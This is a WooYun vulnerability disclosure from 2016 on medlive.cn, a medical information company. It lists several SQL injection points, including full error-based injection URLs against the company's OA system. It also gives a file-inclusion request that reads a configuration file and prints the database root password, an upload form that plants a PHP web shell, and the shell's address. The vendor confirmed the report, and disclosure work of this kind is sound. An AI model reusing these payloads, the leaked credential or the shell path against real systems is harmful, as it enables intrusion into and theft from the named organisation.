当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0215826

漏洞标题:医疗企业安全之医脉通多站多处SQL注入打包&某内部系统Getshell

相关厂商:medlive.cn

漏洞作者: 管管侠

提交时间:2016-06-03 12:03

修复时间:2016-07-18 14:40

公开时间:2016-07-18 14:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-06-03: 细节已通知厂商并且等待厂商处理中
2016-06-03: 厂商已经确认,细节仅向厂商公开
2016-06-13: 细节向核心白帽子及相关领域专家公开
2016-06-23: 细节向普通白帽子公开
2016-07-03: 细节向实习白帽子公开
2016-07-18: 细节向公众公开

简要描述:

送厂商一堆注入点

详细说明:

1.http://fss.medlive.cn/?ac=check&type=email&email=*

1.png


2.http://dic.medlive.cn/common/ajax.inc.php
post:
domain_id=24&ip_id=292458

2.png


3.http://refer.medlive.cn/common/ajax.inc.php
post:
domain_id=24&ip_id=292458

3.png


4.http://mbsjt.medlive.cn/sci/searchCourse/more-course
post:
title=*&page=2

4.png


5.有一堆
http://oa.medlive.cn/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
http://oa.medlive.cn/interface/go.php?APP_UNIT=aa%2527%20and%201=(select%201%20from(select%20count(*),concat(0x7e7e7e,version(),0x7e7e7e,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%20and%20%25271%2527=%25271
http://oa.medlive.cn/inc/finger/use_finger.php?USER_ID=-123%df%27and%20extractvalue(1,%20concat(0x5c,(select%20user()%20from%20`user`%20limit%201)))%23
http://oa.medlive.cn/interface/ugo.php?OA_USER=aaaaaa%2527
http://oa.medlive.cn/module/sel_seal/get.php?ID=1%df%27
http://oa.medlive.cn/ispirit/check_secure_key.php?USERNAME=%df%27 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e7e7e,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x7e7e7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- xxx

5.png


6.文件包含
http://oa.medlive.cn/module/AIP/get_file.php?MODULE=/&ATTACHMENT_ID=.._webroot/inc/oa_config&ATTACHMENT_NAME=php

array( 'default_host' => $MYOA_MEMCACHED_HOST, 'default_port' => $MYOA_MEMCACHED_IP, 'default_persistent' => true, 'default_weight' => 1 ) ); //-- MYOA数据库配置 -- $MYSQL_SERVER="localhost:3336"; $MYSQL_USER="root"; $MYSQL_DB="TD_OA"; $MYSQL_PASS="myoa888"; ?>

漏洞证明:

7.getshell

<form enctype="multipart/form-data" action="http://oa.medlive.cn/general/vmeet/wbUpload.php?fileName=test.php+" method="post">
<input type="file" name="Filedata" size="50"><br>
<input type="submit" value="Upload">
</form>


shell地址:
http://oa.medlive.cn/general/vmeet/wbUpload/cssroot.php

mask 区域
*****^^*****


7.png

修复方案:

没干坏事

版权声明:转载请注明来源 管管侠@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-06-03 14:31

厂商回复:

我们会抓紧时间对这个系统的问题进行修复

最新状态:

暂无


漏洞评价:

评价